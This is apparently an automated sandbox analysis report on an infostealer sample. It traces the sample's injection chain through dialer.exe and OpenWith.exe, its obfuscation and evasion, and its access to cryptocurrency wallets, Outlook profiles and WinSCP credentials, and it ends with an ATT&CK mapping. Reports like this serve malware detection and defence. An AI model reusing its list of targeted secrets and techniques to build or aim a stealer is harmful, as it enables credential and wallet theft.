                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: OpenWith.exe, 00000003.00000003.2320449048.0000025B16DB7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2322773513.0000025B16DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE sqlite_sequence(name,seq) AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)framework;
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: OpenWith.exe, 00000003.00000003.2319637690.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319572365.0000025B17020000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2319529034.0000025B1705F000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330694334.0000025B17000000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2330260861.0000025B17050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: OpenWith.exe, 00000003.00000002.3332829272.0000025B16E6A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333599266.00007DF41F12F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2284622637.0000025B168EB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000003.2278038335.0000025B168E6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: wdeeFKntav.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-1181
                      Source: unknownProcess created: C:\Users\user\Desktop\wdeeFKntav.exe "C:\Users\user\Desktop\wdeeFKntav.exe"
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
                      Source: C:\Windows\SysWOW64\dialer.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Users\user\Desktop\wdeeFKntav.exe Section loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll
                      Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll
                      Source: C:\Windows\SysWOW64\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook
                      Source: wdeeFKntav.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: wdeeFKntav.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.8.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.4.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.10.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.16.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.13.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.2.OpenWith.exe.25b16e1aad0.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.6.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.14.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.5.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.7.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.OpenWith.exe.25b16e1aad0.3.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: wdeeFKntav.exeStatic PE information: section name: .textbss
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC5AF4 pushad ; retf 0_3_00CC5B03
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC6285 push F693B671h; retf 0_3_00CC628A
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC7C52 push dword ptr [edx+ebp+3Bh]; retf 0_3_00CC7C5F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC5DCE push edi; iretd 0_3_00CC5DD5
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC2F4E push eax; retf 0_3_00CC2F4F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC6F48 push es; ret 0_3_00CC6F49
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC416F push ecx; iretd 0_3_00CC417B
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC657C push esi; ret 0_3_00CC6580
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_3_00CC412F pushad ; ret 0_3_00CC4137
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C79429 push cs; retf 0_2_00C79565
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C78964 push ebx; retf 0_2_00C78965
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C7750E push ds; iretd 0_2_00C77517
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C81269 push edx; retf 0_2_00C81422
                      Source: C:\Users\user\Desktop\wdeeFKntav.exeCode function: 0_2_00C7FF22 push edi; iretd 0_2_00C7FF2D
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02723E4E push edi; iretd 2_3_02723E55
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02725CD2 push dword ptr [edx+ebp+3Bh]; retf 2_3_02725CDF
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02723B74 pushad ; retf 2_3_02723B83
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02724305 push F693B671h; retf 2_3_0272430A
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_027245FC push esi; ret 2_3_02724600
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_027221EF push ecx; iretd 2_3_027221FB
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02724FC8 push es; ret 2_3_02724FC9
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_02720FCE push eax; retf 2_3_02720FCF
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 2_3_027221AF pushad ; ret 2_3_027221B7
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F044CA0 push edx; ret 3_2_00007DF41F044CAB
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F049D1E push esi; retf 000Ah3_2_00007DF41F049D1F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F03ABBE str word ptr [ebp+ecx*4+05h]3_2_00007DF41F03ABBE
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW,3_2_00007DF41F058E20
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F0B7344 GetSystemInfo,3_2_00007DF41F0B7344
                      Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData
                      Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default
                      Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
                      Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
                      Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local
                      Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft
                      Source: C:\Users\user\Desktop\wdeeFKntav.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\wdeeFKntav.exe | Code function: 0_3_00CC2277 mov eax, dword ptr fs:[00000030h] 0_3_00CC2277
                      Source: C:\Windows\SysWOW64\dialer.exe | Code function: 2_3_0272027F mov eax, dword ptr fs:[00000030h] 2_3_0272027F
                      Source: C:\Users\user\Desktop\wdeeFKntav.exe | Code function: 0_2_00CC0AA0 HeapCreate,HeapAlloc,HeapAlloc,GetModuleHandleA,HeapAlloc,CreateEventA,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,HeapAlloc,memcpy,HeapFree,WaitForSingleObject,FindCloseChangeNotification,VirtualFree,GetProcessHeap,HeapFree,HeapDestroy, 0_2_00CC0AA0
                      Source: C:\Windows\System32\OpenWith.exe | Code function: 3_2_0000025B14E21A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 3_2_0000025B14E21A90
                      Source: C:\Users\user\Desktop\wdeeFKntav.exe | Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
                      Source: C:\Windows\SysWOW64\dialer.exe | Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Windows\System32\OpenWith.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exe | Code function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 3_2_00007DF41F04F83C
                      Source: C:\Windows\System32\OpenWith.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: !CP:Defichain-Electrum
                      Source: OpenWith.exe, 00000003.00000003.2319977059.0000025B16E29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %AppData%\ElectronCash\config
                      Source: OpenWith.exe, 00000003.00000003.2331811835.0000025B16E48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %AppData%\com.liberty.jaxx
                      Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %AppData%\Exodus\exodus.wallet
                      Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: passphrase.json
                      Source: OpenWith.exe, 00000003.00000003.2287811243.0000025B16D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %AppData%\Exodus\exodus.wallet
                      Source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\BinanceP
                      Source: OpenWith.exe, 00000003.00000003.2318510901.0000025B16E38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
                      Source: C:\Windows\System32\OpenWith.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
                      Source: C:\Windows\System32\OpenWith.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Windows\System32\OpenWith.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
                      Source: C:\Windows\System32\OpenWith.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                      Source: Yara match | File source: Process Memory Space: OpenWith.exe PID: 1880, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match | File source: 00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.2285525556.0000025B16FB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.3333238865.0000025B171B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.2241149327.0000000004570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2113793924.0000000003C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\OpenWith.exe | Code function: 3_2_00007DF41F04F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 3_2_00007DF41F04F83C
                      Source: C:\Windows\System32\OpenWith.exe | Code function: 3_2_00007DF41F0814B8 socket,bind, 3_2_00007DF41F0814B8
                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
                      Execution: 11 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Native API; Cron; Launchd
                      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
                      Privilege Escalation: 12 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
                      Defense Evasion: 2 Virtualization/Sandbox Evasion; 12 Process Injection; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
                      Credential Access: 1 OS Credential Dumping; 21 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets
